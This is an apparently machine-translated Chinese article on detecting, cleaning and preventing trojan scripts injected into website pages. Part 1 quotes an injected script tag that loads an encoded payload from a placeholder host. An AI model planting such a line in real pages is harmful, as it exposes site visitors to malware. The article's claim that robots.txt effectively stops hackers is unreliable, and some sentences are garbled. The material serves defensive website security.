在网站的优化设计中,检测网站木马也是一项重要的工作。 现在流行的网站被黑客入侵是通过js调用方式插入到相应的asp、htm、js等文件中的。 本文介绍了网页的马的种类、如何检测网页是否被马挂住、如何去除网络木马。 如何避免网页被马挂住。
第1:页的马类型
现在流行的网站被黑客攻击是以js调用方式插入到相应的asp、htm、js等文件中的。 点击查看挂马代码大全了解更多信息。
被撒娇的夕阳以前做的lsquo; 终极源代码下载站rsquo; 我遇到过JS的马
script language=' jscript.encode ' src=http://www.XXX.com/muma.txt/script
lsquo; 善于撒娇的夕阳论坛rsquo; 对于挖掘用户权利,您拥有通过利用视频程序漏洞上传附件漏洞的站点管理员权限。 删除了论坛的数千个数据,一千多个会员的ID
2:如何检测网页是否被挂马。
(1)专业检测工具、6种免费网页安全检测工具的横向评估
)2)可以通过谷歌检查,或者用谷歌搜索你的网站、博客进行检查。 如果有木马所在的网站,谷歌会在搜索列表下提示该网站存在不安全因素。
)3)杀毒软件的检测,也可以通过常用的杀毒软件进行检测。
)4)人工检测,打开你的网站、博客,右击查看源文件,还可以根据网站的马的种类查询是否击中了木马。
(5)使用360个网站安全监测。 例:撒娇的夕阳是否安全请看这里。
3:如何清除网页木马。
如果你碰到网络木马,你会看到这些文件是最近修改的,主要是看这些新文件。 (可以从FTP上看到文件最近的修改时间。 )然后进入源文件删除相关网页的马种类可疑代码。
如果不熟悉您的网站、博客程序,建议删除所有文件。 (可以保留数据库、图片、文档、程序模板主题等文件夹。 )
4:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。
(1)向互联网用户开放上传附件功能的网站必须进行身份认证,只有可靠的人才可以使用上传程序。
)2)保证使用的程序及时更新。
)3)不在首页写守护进程登录页的链接。
)4)频繁备份数据库等重要文件,但不将备份数据库放在程序的默认备份目录下。
)5)管理员的用户名和密码在一定程度上很复杂,不能过于简单。
)6) IIS中禁止写入和禁止目录执行的功能,通过组合这两个功能,可以有效地防止ASP特洛伊木马。
)7)在服务器、虚拟主机的控制面板中,在设置运行权限选项中,可以将具有直接上传权限的目录取消对ASP的运行权限。
(8)制作robots.txt并上传到网站根目录。 Robots可以有效地防范通过搜索引擎窃取信息的黑客。